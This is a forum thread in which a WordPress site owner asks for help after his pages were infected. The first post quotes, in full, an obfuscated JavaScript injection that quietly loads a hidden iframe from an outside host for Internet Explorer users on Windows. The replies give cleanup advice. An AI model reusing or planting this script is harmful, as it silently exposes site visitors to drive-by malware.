1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Need help on WP self-hosted site's malware infection - Java

Discussion in 'Black Hat SEO' started by csyhomme, Nov 7, 2011.

  1. csyhomme

    csyhomme Regular Member

    Joined:
    Oct 6, 2010
    Messages:
    241
    Likes Received:
    22
    Home Page:
    Any one got this issue ? Just yesterday google detected one of my site ( self-hosted WP ) for malware and got 18 pages which has this on :

    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?
    '':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c
    .toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c
    )]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){retu
    rn'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\
    \b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!
    a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\'
    ;0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3(
    "p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u(
    "9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|M
    akeFrameEx|element|yahoo_api|height|width|display|none|body|
    getElementById|function|createElement|iframe|appendChild|src
    |id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http
    |userAgent|1000|hngfxhgfx|navigator|ai|showthread|php|722417
    32'.split('|'),0,{}))
    </script>

    Would really like to know what I should do next, trying to grab an idea on how to clean it, any help is appreciated. Remove the code from those 18 pages will do ?? or there is more than that ?

    Thanks in advance
     
  2. sukataetumba

    sukataetumba Senior Member

    Joined:
    May 25, 2010
    Messages:
    1,109
    Likes Received:
    213
    how many pages do you have in total? look for that code and delete it.

    login your dashboard. go to appearance. then click editor. most likely you will find that code in either page.php or single.php or index.php
     
  3. ardley216

    ardley216 Elite Member

    Joined:
    Mar 28, 2008
    Messages:
    2,391
    Likes Received:
    2,356
    Occupation:
    Finding easy keywords
    Location:
    1,500,000,000 Keywords Re
    Home Page:

    I received this code on my wp site, totally messed up my laptop. It really pissed me off, I posted a thread about it and no one was helpful.

    I spoke to my host provider and they removed all infected files and replaces them with the backups they had stored.
     
  4. csyhomme

    csyhomme Regular Member

    Joined:
    Oct 6, 2010
    Messages:
    241
    Likes Received:
    22
    Home Page:
    There are 85 pages on the site, and try to find the code but with no success, I have back up but I am afraid that it will effect my original contents from last update. And today, there are more sites got infected, all of them are WP sites .. damn ... anyone ?
     
  5. vinbar

    vinbar Newbie

    Joined:
    Dec 30, 2010
    Messages:
    10
    Likes Received:
    0
    PM me, have had the same problem
     
  6. csyhomme

    csyhomme Regular Member

    Joined:
    Oct 6, 2010
    Messages:
    241
    Likes Received:
    22
    Home Page:
    Problem solved, better secure all your WP site better this time !
     
  7. catmanu

    catmanu Junior Member

    Joined:
    Dec 27, 2010
    Messages:
    108
    Likes Received:
    27
    Was it that he didnt update or he installed some bad plugins/themes?